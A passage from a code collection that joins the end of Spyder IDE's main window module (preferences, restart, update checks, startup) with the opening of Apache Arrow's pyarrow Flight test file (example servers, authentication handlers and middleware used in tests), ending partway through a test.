style_name = CONF.get('appearance', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage'),
(self.clock_status, 'clock')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
# Update conda status widget
if is_anaconda() and self.conda_status:
interpreter = self.get_main_interpreter()
self.conda_status.update_interpreter(interpreter)
else:
return
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
from spyder.preferences.configdialog import ConfigDialog
def _dialog_finished(result_code):
"""Restore preferences dialog instance variable."""
self.prefs_dialog_instance = None
if self.prefs_dialog_instance is None:
dlg = ConfigDialog(self)
dlg.setStyleSheet("QTabWidget::tab-bar {"
"alignment: left;}")
self.prefs_dialog_instance = dlg
# Setup
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
widget = self.completions._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
for completion_plugin in self.completions.clients.values():
completion_plugin = completion_plugin['plugin']
widget = completion_plugin._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
for plugin in [self.appearance,
self.run,
self.shortcuts,
self.workingdirectory,
self.editor,
self.projects,
self.ipyconsole,
self.historylog,
self.help,
self.variableexplorer,
self.onlinehelp,
self.explorer,
self.findinfiles] + self.thirdparty_plugins:
if plugin is not None:
# New API
if getattr(plugin, 'CONF_WIDGET_CLASS', None):
try:
widget = self.create_plugin_conf_widget(plugin)
if widget is not None:
dlg.add_page(widget)
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
# Old API
try:
widget = plugin._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
except AttributeError:
pass
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
# Check settings and show dialog
dlg.show()
dlg.check_all_settings()
# Signals
dlg.finished.connect(_dialog_finished)
dlg.pages_widget.currentChanged.connect(
self.__preference_page_changed)
dlg.size_change.connect(self.set_prefs_size)
else:
self.prefs_dialog_instance.show()
self.prefs_dialog_instance.activateWindow()
self.prefs_dialog_instance.raise_()
self.prefs_dialog_instance.setFocus()
def __preference_page_changed(self, index):
"""Preference page index has changed."""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset True it allows to reset spyder on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
repo_dir = osp.dirname(spyder_start_directory)
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join([repo_dir])
else:
env['PYTHONPATH'] = ':'.join([repo_dir])
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
delta_top = (self.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used when after startup (when using the
# menu action, and gives feeback if updates are, or are not found.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = __project_url__ + '/releases'
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
anaconda_msg = ''
if 'Anaconda' in sys.version or 'conda-forge' in sys.version:
anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems "
"that you are using Spyder with "
"<b>Anaconda/Miniconda</b>. Please "
"<b>don't</b> use <code>pip</code> to "
"update it as that will probably break "
"your installation.<br><br>"
"Instead, please wait until new conda "
"packages are available and use "
"<code>conda</code> to perform the "
"update.<hr>")
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
msg += '<br>' + anaconda_msg
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feeback when clicking menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self, startup=False):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
# --- Main interpreter
# ------------------------------------------------------------------------
def get_main_interpreter(self):
if CONF.get('main_interpreter', 'default'):
return sys.executable
else:
return CONF.get('main_interpreter', 'custom_interpreter')
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
# --- Set application icon
app.setWindowIcon(APP_ICON)
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if sys.platform == "darwin":
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = initialize()
window = run_spyder(app, CLI_OPTIONS, None)
return window
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, argparse won't be able to exit if --help option is passed
options, args = (CLI_OPTIONS, CLI_ARGS)
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = initialize()
# **** Handle other options ****
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = run_spyder(app, options, args)
else:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
test_flight.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ast
import base64
import os
import struct
import tempfile
import threading
import time
import traceback
import numpy as np
import pytest
import pyarrow as pa
from pyarrow.lib import tobytes
from pyarrow.util import pathlib, find_free_port
try:
from pyarrow import flight
from pyarrow.flight import (
FlightClient, FlightServerBase,
ServerAuthHandler, ClientAuthHandler,
ServerMiddleware, ServerMiddlewareFactory,
ClientMiddleware, ClientMiddlewareFactory,
)
except ImportError:
flight = None
FlightClient, FlightServerBase = object, object
ServerAuthHandler, ClientAuthHandler = object, object
ServerMiddleware, ServerMiddlewareFactory = object, object
ClientMiddleware, ClientMiddlewareFactory = object, object
# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not flight'
pytestmark = pytest.mark.flight
def test_import():
# So we see the ImportError somewhere
import pyarrow.flight # noqa
def resource_root():
"""Get the path to the test resources directory."""
if not os.environ.get("ARROW_TEST_DATA"):
raise RuntimeError("Test resources not found; set "
"ARROW_TEST_DATA to <repo root>/testing/data")
return pathlib.Path(os.environ["ARROW_TEST_DATA"]) / "flight"
def read_flight_resource(path):
"""Get the contents of a test resource file."""
root = resource_root()
if not root:
return None
try:
with (root / path).open("rb") as f:
return f.read()
except FileNotFoundError:
raise RuntimeError(
"Test resource {} not found; did you initialize the "
"test resource submodule?\n{}".format(root / path,
traceback.format_exc()))
def example_tls_certs():
"""Get the paths to test TLS certificates."""
return {
"root_cert": read_flight_resource("root-ca.pem"),
"certificates": [
flight.CertKeyPair(
cert=read_flight_resource("cert0.pem"),
key=read_flight_resource("cert0.key"),
),
flight.CertKeyPair(
cert=read_flight_resource("cert1.pem"),
key=read_flight_resource("cert1.key"),
),
]
}
def simple_ints_table():
data = [
pa.array([-10, -5, 0, 5, 10])
]
return pa.Table.from_arrays(data, names=['some_ints'])
def simple_dicts_table():
dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
data = [
pa.chunked_array([
pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
pa.DictionaryArray.from_arrays([2, 1], dict_values)
])
]
return pa.Table.from_arrays(data, names=['some_dicts'])
class ConstantFlightServer(FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
CRITERIA = b"the expected criteria"
def __init__(self, location=None, options=None, **kwargs):
super().__init__(location, **kwargs)
# Ticket -> Table
self.table_factories = {
b'ints': simple_ints_table,
b'dicts': simple_dicts_table,
}
self.options = options
def list_flights(self, context, criteria):
if criteria == self.CRITERIA:
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
def do_get(self, context, ticket):
# Return a fresh table, so that Flight is the only one keeping a
# reference.
table = self.table_factories[ticket.ticket]()
return flight.RecordBatchStream(table, options=self.options)
class MetadataFlightServer(FlightServerBase):
"""A Flight server that numbers incoming/outgoing data."""
def __init__(self, options=None, **kwargs):
super().__init__(**kwargs)
self.options = options
def do_get(self, context, ticket):
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
return flight.GeneratorStream(
table.schema,
self.number_batches(table),
options=self.options)
def do_put(self, context, descriptor, reader, writer):
counter = 0
expected_data = [-10, -5, 0, 5, 10]
while True:
try:
batch, buf = reader.read_chunk()
assert batch.equals(pa.RecordBatch.from_arrays(
[pa.array([expected_data[counter]])],
['a']
))
assert buf is not None
client_counter, = struct.unpack('<i', buf.to_pybytes())
assert counter == client_counter
writer.write(struct.pack('<i', counter))
counter += 1
except StopIteration:
return
@staticmethod
def number_batches(table):
for idx, batch in enumerate(table.to_batches()):
buf = struct.pack('<i', idx)
yield batch, buf
class EchoFlightServer(FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self, location=None, expected_schema=None, **kwargs):
super().__init__(location, **kwargs)
self.last_message = None
self.expected_schema = expected_schema
def do_get(self, context, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, context, descriptor, reader, writer):
if self.expected_schema:
assert self.expected_schema == reader.schema
self.last_message = reader.read_all()
class EchoStreamFlightServer(EchoFlightServer):
"""An echo server that streams individual record batches."""
def do_get(self, context, ticket):
return flight.GeneratorStream(
self.last_message.schema,
self.last_message.to_batches(max_chunksize=1024))
def list_actions(self, context):
return []
def do_action(self, context, action):
if action.type == "who-am-i":
return [context.peer_identity(), context.peer().encode("utf-8")]
raise NotImplementedError
class GetInfoFlightServer(FlightServerBase):
"""A Flight server that tests GetFlightInfo."""
def get_flight_info(self, context, descriptor):
return flight.FlightInfo(
pa.schema([('a', pa.int32())]),
descriptor,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
def get_schema(self, context, descriptor):
info = self.get_flight_info(context, descriptor)
return flight.SchemaResult(info.schema)
class ListActionsFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
@classmethod
def expected_actions(cls):
return [
("action-1", "description"),
("action-2", ""),
flight.ActionType("action-3", "more detail"),
]
def list_actions(self, context):
yield from self.expected_actions()
class ListActionsErrorFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
def list_actions(self, context):
yield ("action-1", "")
yield "foo"
class CheckTicketFlightServer(FlightServerBase):
"""A Flight server that compares the given ticket to an expected value."""
def __init__(self, expected_ticket, location=None, **kwargs):
super().__init__(location, **kwargs)
self.expected_ticket = expected_ticket
def do_get(self, context, ticket):
assert self.expected_ticket == ticket.ticket
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
return flight.RecordBatchStream(table)
def do_put(self, context, descriptor, reader):
self.last_message = reader.read_all()
class InvalidStreamFlightServer(FlightServerBase):
"""A Flight server that tries to return messages with differing schemas."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())]
assert data1.type != data2.type
table1 = pa.Table.from_arrays(data1, names=['a'])
table2 = pa.Table.from_arrays(data2, names=['a'])
assert table1.schema == self.schema
return flight.GeneratorStream(self.schema, [table1, table2])
class SlowFlightServer(FlightServerBase):
"""A Flight server that delays its responses to test timeouts."""
def do_get(self, context, ticket):
return flight.GeneratorStream(pa.schema([('a', pa.int32())]),
self.slow_stream())
def do_action(self, context, action):
time.sleep(0.5)
return []
@staticmethod
def slow_stream():
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
yield pa.Table.from_arrays(data1, names=['a'])
# The second message should never get sent; the client should
# cancel before we send this
time.sleep(10)
yield pa.Table.from_arrays(data1, names=['a'])
class ErrorFlightServer(FlightServerBase):
"""A Flight server that uses all the Flight-specific errors."""
def do_action(self, context, action):
if action.type == "internal":
raise flight.FlightInternalError("foo")
elif action.type == "timedout":
raise flight.FlightTimedOutError("foo")
elif action.type == "cancel":
raise flight.FlightCancelledError("foo")
elif action.type == "unauthenticated":
raise flight.FlightUnauthenticatedError("foo")
elif action.type == "unauthorized":
raise flight.FlightUnauthorizedError("foo")
elif action.type == "protobuf":
err_msg = b'this is an error message'
raise flight.FlightUnauthorizedError("foo", err_msg)
raise NotImplementedError
def list_flights(self, context, criteria):
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
raise flight.FlightInternalError("foo")
class ExchangeFlightServer(FlightServerBase):
"""A server for testing DoExchange."""
def __init__(self, options=None, **kwargs):
super().__init__(**kwargs)
self.options = options
def do_exchange(self, context, descriptor, reader, writer):
if descriptor.descriptor_type != flight.DescriptorType.CMD:
raise pa.ArrowInvalid("Must provide a command descriptor")
elif descriptor.command == b"echo":
return self.exchange_echo(context, reader, writer)
elif descriptor.command == b"get":
return self.exchange_do_get(context, reader, writer)
elif descriptor.command == b"put":
return self.exchange_do_put(context, reader, writer)
elif descriptor.command == b"transform":
return self.exchange_transform(context, reader, writer)
else:
raise pa.ArrowInvalid(
"Unknown command: {}".format(descriptor.command))
def exchange_do_get(self, context, reader, writer):
"""Emulate DoGet with DoExchange."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
writer.begin(data.schema)
writer.write_table(data)
def exchange_do_put(self, context, reader, writer):
"""Emulate DoPut with DoExchange."""
num_batches = 0
for chunk in reader:
if not chunk.data:
raise pa.ArrowInvalid("All chunks must have data.")
num_batches += 1
writer.write_metadata(str(num_batches).encode("utf-8"))
def exchange_echo(self, context, reader, writer):
"""Run a simple echo server."""
started = False
for chunk in reader:
if not started and chunk.data:
writer.begin(chunk.data.schema, options=self.options)
started = True
if chunk.app_metadata and chunk.data:
writer.write_with_metadata(chunk.data, chunk.app_metadata)
elif chunk.app_metadata:
writer.write_metadata(chunk.app_metadata)
elif chunk.data:
writer.write_batch(chunk.data)
else:
assert False, "Should not happen"
def exchange_transform(self, context, reader, writer):
"""Sum rows in an uploaded table."""
for field in reader.schema:
if not pa.types.is_integer(field.type):
raise pa.ArrowInvalid("Invalid field: " + repr(field))
table = reader.read_all()
sums = [0] * table.num_rows
for column in table:
for row, value in enumerate(column):
sums[row] += value.as_py()
result = pa.Table.from_arrays([pa.array(sums)], names=["sum"])
writer.begin(result.schema)
writer.write_table(result)
class HttpBasicServerAuthHandler(ServerAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
buf = incoming.read()
auth = flight.BasicAuth.deserialize(buf)
if auth.username not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
if self.creds[auth.username] != auth.password:
raise flight.FlightUnauthenticatedError("wrong password")
outgoing.write(tobytes(auth.username))
def is_valid(self, token):
if not token:
raise flight.FlightUnauthenticatedError("token not provided")
if token not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
return token
class HttpBasicClientAuthHandler(ClientAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, username, password):
super().__init__()
self.basic_auth = flight.BasicAuth(username, password)
self.token = None
def authenticate(self, outgoing, incoming):
auth = self.basic_auth.serialize()
outgoing.write(auth)
self.token = incoming.read()
def get_token(self):
return self.token
class TokenServerAuthHandler(ServerAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
username = incoming.read()
password = incoming.read()
if username in self.creds and self.creds[username] == password:
outgoing.write(base64.b64encode(b'secret:' + username))
else:
raise flight.FlightUnauthenticatedError(
"invalid username/password")
def is_valid(self, token):
token = base64.b64decode(token)
if not token.startswith(b'secret:'):
raise flight.FlightUnauthenticatedError("invalid token")
return token[7:]
class TokenClientAuthHandler(ClientAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, username, password):
super().__init__()
self.username = username
self.password = password
self.token = b''
def authenticate(self, outgoing, incoming):
outgoing.write(self.username)
outgoing.write(self.password)
self.token = incoming.read()
def get_token(self):
return self.token
class HeaderServerMiddleware(ServerMiddleware):
"""Expose a per-call value to the RPC method body."""
def __init__(self, special_value):
self.special_value = special_value
class HeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Expose a per-call hard-coded value to the RPC method body."""
def start_call(self, info, headers):
return HeaderServerMiddleware("right value")
class HeaderFlightServer(FlightServerBase):
"""Echo back the per-call hard-coded value."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
if middleware:
return [middleware.special_value.encode()]
return [b""]
class MultiHeaderFlightServer(FlightServerBase):
"""Test sending/receiving multiple (binary-valued) headers."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
headers = repr(middleware.client_headers).encode("utf-8")
return [headers]
class SelectiveAuthServerMiddlewareFactory(ServerMiddlewareFactory):
"""Deny access to certain methods based on a header."""
def start_call(self, info, headers):
if info.method == flight.FlightMethod.LIST_ACTIONS:
# No auth needed
return
token = headers.get("x-auth-token")
if not token:
raise flight.FlightUnauthenticatedError("No token")
token = token[0]
if token != "password":
raise flight.FlightUnauthenticatedError("Invalid token")
return HeaderServerMiddleware(token)
class SelectiveAuthClientMiddlewareFactory(ClientMiddlewareFactory):
def start_call(self, info):
return SelectiveAuthClientMiddleware()
class SelectiveAuthClientMiddleware(ClientMiddleware):
def sending_headers(self):
return {
"x-auth-token": "password",
}
class RecordingServerMiddlewareFactory(ServerMiddlewareFactory):
"""Record what methods were called."""
def __init__(self):
super().__init__()
self.methods = []
def start_call(self, info, headers):
self.methods.append(info.method)
return None
class RecordingClientMiddlewareFactory(ClientMiddlewareFactory):
"""Record what methods were called."""
def __init__(self):
super().__init__()
self.methods = []
def start_call(self, info):
self.methods.append(info.method)
return None
class MultiHeaderClientMiddlewareFactory(ClientMiddlewareFactory):
"""Test sending/receiving multiple (binary-valued) headers."""
def __init__(self):
# Read in test_middleware_multi_header below.
# The middleware instance will update this value.
self.last_headers = {}
def start_call(self, info):
return MultiHeaderClientMiddleware(self)
class MultiHeaderClientMiddleware(ClientMiddleware):
"""Test sending/receiving multiple (binary-valued) headers."""
EXPECTED = {
"x-text": ["foo", "bar"],
"x-binary-bin": [b"\x00", b"\x01"],
}
def __init__(self, factory):
self.factory = factory
def sending_headers(self):
return self.EXPECTED
def received_headers(self, headers):
# Let the test code know what the last set of headers we
# received were.
self.factory.last_headers = headers
class MultiHeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Test sending/receiving multiple (binary-valued) headers."""
def start_call(self, info, headers):
return MultiHeaderServerMiddleware(headers)
class MultiHeaderServerMiddleware(ServerMiddleware):
"""Test sending/receiving multiple (binary-valued) headers."""
def __init__(self, client_headers):
self.client_headers = client_headers
def sending_headers(self):
return MultiHeaderClientMiddleware.EXPECTED
def test_flight_server_location_argument():
locations = [
None,
'grpc://localhost:0',
('localhost', find_free_port()),
]
for location in locations:
with FlightServerBase(location) as server:
assert isinstance(server, FlightServerBase)
def test_server_exit_reraises_exception():
with pytest.raises(ValueError):
